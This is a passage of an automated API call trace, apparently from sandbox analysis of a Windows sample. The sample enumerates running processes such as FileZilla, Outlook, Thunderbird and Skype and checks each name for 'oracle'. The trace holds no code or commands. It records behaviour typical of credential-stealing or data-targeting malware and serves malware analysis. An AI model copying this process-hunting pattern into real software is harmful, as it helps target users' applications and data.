th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0092.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.242] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35425d8 [0092.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35425d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0092.242] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0092.242] StrStrIA (lpFirst="barca.exe", lpSrch="oracle") returned 0x0 [0092.242] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0092.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.244] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542878 [0092.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3542878, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0092.244] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0092.244] StrStrIA (lpFirst="bitkinex.exe", lpSrch="oracle") returned 0x0 [0092.244] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0092.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.245] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542740 [0092.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3542740, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0092.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0092.245] StrStrIA (lpFirst="coreftp.exe", lpSrch="oracle") returned 0x0 [0092.245] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0092.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.246] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35476b8 [0092.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x35476b8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0092.247] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0092.247] StrStrIA (lpFirst="far.exe", lpSrch="oracle") returned 0x0 [0092.247] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0092.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.248] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3542758 [0092.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3542758, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0092.248] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0092.248] StrStrIA (lpFirst="filezilla.exe", lpSrch="oracle") returned 0x0 [0092.248] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0092.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.249] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542590 [0092.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3542590, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.249] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0092.249] StrStrIA (lpFirst="flashfxp.exe", lpSrch="oracle") returned 0x0 [0092.249] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0092.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.251] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35426c8 [0092.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35426c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0092.251] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0092.251] StrStrIA (lpFirst="fling.exe", lpSrch="oracle") returned 0x0 [0092.251] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0092.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.252] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3542e18 [0092.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3542e18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0092.252] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0092.252] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="oracle") returned 0x0 [0092.252] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0092.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.254] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3543098 [0092.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3543098, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0092.254] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0092.254] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="oracle") returned 0x0 [0092.254] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0092.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.255] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35477d8 [0092.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35477d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0092.255] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0092.255] StrStrIA (lpFirst="icq.exe", lpSrch="oracle") returned 0x0 [0092.255] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0092.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.256] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35425a8 [0092.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35425a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.256] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0092.256] StrStrIA (lpFirst="leechftp.exe", lpSrch="oracle") returned 0x0 [0092.256] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0092.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.258] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35425f0 [0092.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x35425f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.258] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0092.258] StrStrIA (lpFirst="ncftp.exe", lpSrch="oracle") returned 0x0 [0092.258] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0092.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.259] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542788 [0092.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3542788, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0092.259] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0092.259] StrStrIA (lpFirst="notepad.exe", lpSrch="oracle") returned 0x0 [0092.259] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0092.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.260] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35427a0 [0092.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35427a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0092.260] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0092.261] StrStrIA (lpFirst="operamail.exe", lpSrch="oracle") returned 0x0 [0092.261] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0092.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.262] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543eb0 [0092.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3543eb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0092.262] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0092.262] StrStrIA (lpFirst="outlook.exe", lpSrch="oracle") returned 0x0 [0092.262] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0092.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.263] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3544000 [0092.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3544000, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0092.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0092.263] StrStrIA (lpFirst="pidgin.exe", lpSrch="oracle") returned 0x0 [0092.264] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0092.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.265] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35440c0 [0092.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x35440c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0092.265] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0092.265] StrStrIA (lpFirst="scriptftp.exe", lpSrch="oracle") returned 0x0 [0092.265] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0092.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.266] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543ec8 [0092.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3543ec8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0092.266] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0092.266] StrStrIA (lpFirst="skype.exe", lpSrch="oracle") returned 0x0 [0092.266] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0092.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.268] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543ef8 [0092.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543ef8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.268] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0092.278] StrStrIA (lpFirst="smartftp.exe", lpSrch="oracle") returned 0x0 [0092.278] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0092.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.279] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35440a8 [0092.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x35440a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0092.279] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0092.279] StrStrIA (lpFirst="thunderbird.exe", lpSrch="oracle") returned 0x0 [0092.279] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0092.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.281] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3544150 [0092.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3544150, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0092.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0092.281] StrStrIA (lpFirst="totalcmd.exe", lpSrch="oracle") returned 0x0 [0092.281] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0092.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.282] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3544090 [0092.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3544090, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0092.282] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0092.282] StrStrIA (lpFirst="trillian.exe", lpSrch="oracle") returned 0x0 [0092.282] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0092.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.284] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35440f0 [0092.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35440f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0092.284] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0092.284] StrStrIA (lpFirst="webdrive.exe", lpSrch="oracle") returned 0x0 [0092.284] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0092.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, 